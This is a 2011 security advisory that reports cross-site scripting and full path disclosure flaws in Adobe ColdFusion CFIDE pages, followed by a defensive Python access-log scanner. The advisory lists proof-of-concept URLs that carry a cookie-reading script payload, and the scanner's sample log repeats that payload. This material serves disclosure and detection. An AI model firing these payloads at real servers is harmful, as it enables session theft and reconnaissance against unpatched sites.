Adobe ColdFusion 7 Cross Site Scripting

2011-09-27T00:00:00
ID PACKETSTORM:105344
Type packetstorm
Reporter MustLive
Modified 2011-09-27T00:00:00

Description

                                        
Hello list!  
  
I want to warn you about new security vulnerabilities in Adobe ColdFusion.  
  
These are Cross-Site Scripting and Full path disclosure vulnerabilities.  
  
-------------------------  
Affected products:  
-------------------------  
  
Adobe ColdFusion 7 and previous versions are vulnerable to XSS, and Adobe  
ColdFusion 9 and previous versions to FPD.  
  
----------  
Details:  
----------  
  
XSS (WASC-08):  
  
http://site/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E  
  
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E  
  
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E  
  
http://site/CFIDE/componentutils/cfcexplorer.cfc (XSS via header User-Agent)  
  
http://site/CFIDE/probe.cfm (XSS via header User-Agent)  
  
http://site/CFIDE/Application.cfm (XSS via header User-Agent)  
  
http://site/CFIDE/componentutils/Application.cfm (XSS via header User-Agent)  
  
http://site/CFIDE/componentutils/_component_cfcToHTML.cfm (XSS via header  
User-Agent)  
  
http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm (XSS via header  
User-Agent)  
  
Full path disclosure (WASC-13):  
  
http://site/CFIDE/probe.cfm  
  
http://site/CFIDE/componentutils/componentdetail.cfm?component=CFIDE.adminapi.base  
  
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=WEB-INF.cftags.component  
  
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=1  
  
http://site/CFIDE/componentutils/_component_cfcToHTML.cfm  
  
http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm  
  
Via componentdetail.cfm and cfcexplorer.cfc it's possible to get FPD even with  
debug messages turned off on the server.  
  
------------  
Timeline:  
------------  
  
2011.06.25 - announced at my site.  
2011.06.30 - informed developers.  
2011.09.23 - disclosed at my site.  
  
I mentioned these vulnerabilities on my site:  
http://websecurity.com.ua/5243/  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua  
  
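For defenders, the endpoints listed in the advisory can be turned into an access-log check that flags requests to them and notes whether markup arrived in the query string or the User-Agent header. This is an added example, not part of the advisory; it assumes the Apache/Nginx "combined" log format, and the function names, sample log lines and client addresses are constructed.

```python
import re
from urllib.parse import unquote
# Endpoints listed in the advisory, lower-cased for case-insensitive matching.
ADVISORY_PATHS = {
    "/cfide/probe.cfm", "/cfide/application.cfm",
    "/cfide/componentutils/application.cfm",
    "/cfide/componentutils/componentdetail.cfm",
    "/cfide/componentutils/cfcexplorer.cfc",
    "/cfide/componentutils/_component_cfctohtml.cfm",
    "/cfide/componentutils/_component_cfctomcdl.cfm",
}
# Assumption: "combined" access-log format; captures client, request target, User-Agent.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" \d{3} \S+ "[^"]*" "((?:[^"\\]|\\.)*)"')
MARKUP_RE = re.compile(r"[<>]")  # angle brackets do not belong in these fields
# Constructed sample input (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Sep/2011:10:00:00 +0000] "GET /CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [27/Sep/2011:10:00:05 +0000] "GET /CFIDE/probe.cfm HTTP/1.1" 200 512 "-" "<b>constructed-test</b>"',
    '203.0.113.7 - - [27/Sep/2011:10:00:09 +0000] "GET /CFIDE/componentutils/cfcexplorer.cfc?method=1 HTTP/1.1" 500 900 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [27/Sep/2011:10:00:12 +0000] "GET /index.cfm?q=%3Cb%3E HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

def fully_unquote(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (catches double encoding)."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def scan(lines):
    """Return (client, path, reason) for each request to an advisory endpoint."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, agent = m.groups()
        path, _, query = target.partition("?")
        path = fully_unquote(path).lower()
        if path not in ADVISORY_PATHS:
            continue
        if MARKUP_RE.search(fully_unquote(query)):
            reason = "markup in query string"
        elif MARKUP_RE.search(agent):
            reason = "markup in User-Agent"
        else:
            reason = "advisory endpoint requested"
        findings.append((client, path, reason))
    return findings
```

Any hit from outside an administrative network is worth reviewing, since the advisory lists several of these pages as disclosing the full path even without injected markup.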